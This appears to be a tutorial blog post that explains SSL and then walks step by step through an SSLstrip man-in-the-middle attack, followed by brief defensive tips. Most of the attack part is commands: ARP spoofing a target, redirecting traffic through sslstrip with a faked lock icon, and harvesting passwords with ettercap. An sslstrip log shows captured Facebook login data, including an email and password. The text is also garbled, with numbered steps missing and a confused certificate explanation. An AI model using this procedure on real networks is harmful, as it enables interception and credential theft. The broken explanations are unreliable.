What is SSL and how it Works:
1. the client browser requests from the web server it’s identification
3. the browser checks the certificate in a list of trusted CAs, and that the certificate is unexpired , unrevoked , it’s name is valid, if the browser trusts the certificates it creates and sends to the server the session key (symmetric key) encrypted with the server’s public key.
4. server decrypts the symmetric session key and sends back to the client acknowledgement encrypted with the session key to start the encrypted session
5. server and client now encrypts all transmitted data using the symmetric session key
What is Man-in-the-Middle Attack:
in case it didn’t accept the command try the below
$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
user@bt:~$ sudo -i root@bt:~# root@bt:~# cat /proc/sys/net/ipv4/ip_forward 0 root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
2. redirecting traffic to port that SSLstrip listens to:
$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234
3. running SSLstrip:
$ user@bt:/pentest/web/sslstrip$ sudo python sslstrip.py -k -l 1234 -f lock.ico
- -k: tells the system to kill all currently active sessions, forcing users to re-login to their websites.
- -l: Listened Port
- -f: add the https lock icon to deceive the client and let him thinks that connection is secured
4. ARP Spoofing (ARP Cache Poisoning) your network using arpspoof tool:
$ arpspoof -i <interface> -t <targetIP> <gatewayIP>
5. Running ethercap to catch the username and password clearly:
$ ettercap -Tq -i <interface>
- T: runs ettercap in text mode
- q: quite mode, It does not print packet content. It is useful if you want to convert pcap file to ettercap log files.
Or you get it from the SSLstrip logs as below:
user@bt:~$ cat /pentest/web/sslstrip/sslstrip.log 2013-06-23 05:32:54,818 SECURE POST Data (www.facebook.com): lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023206_glAf&lgnjs=n&locale=en_US 2013-06-23 05:32:57,997 SECURE POST Data (www.facebook.com): lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023206_glAf&lgnjs=n&locale=en_US 2013-06-23 05:33:15,696 SECURE POST Data (www.facebook.com): lsd=AVrakCZQ&email=madooolol%40yahoo.com&pass=12345678&default_persistent=0&timezone=&lgnrnd=023259_32LY&lgnjs=n&locale=en_US
Defensive actions should be done by the security professional:
- Dynamic ARP Inspection feature can be used to protect from ARP spoofing
- make sure that the lock beside the url bar exists and it’s colour is green as shown below this will make you “slightly” sure that the connection is end-to-end (between client and server ) is encrypted.
- Trusted Certificates example:
Bad Certificates example: in the following example MITM attack occurs , the traffic is encrypted between the victim and the client with a certificate issued by the attacker, he decrypts the traffic , compromise it , encrypts it again with the correct certificate (issued by the trusted CA) and finally sends it to the server.
- Real life practices.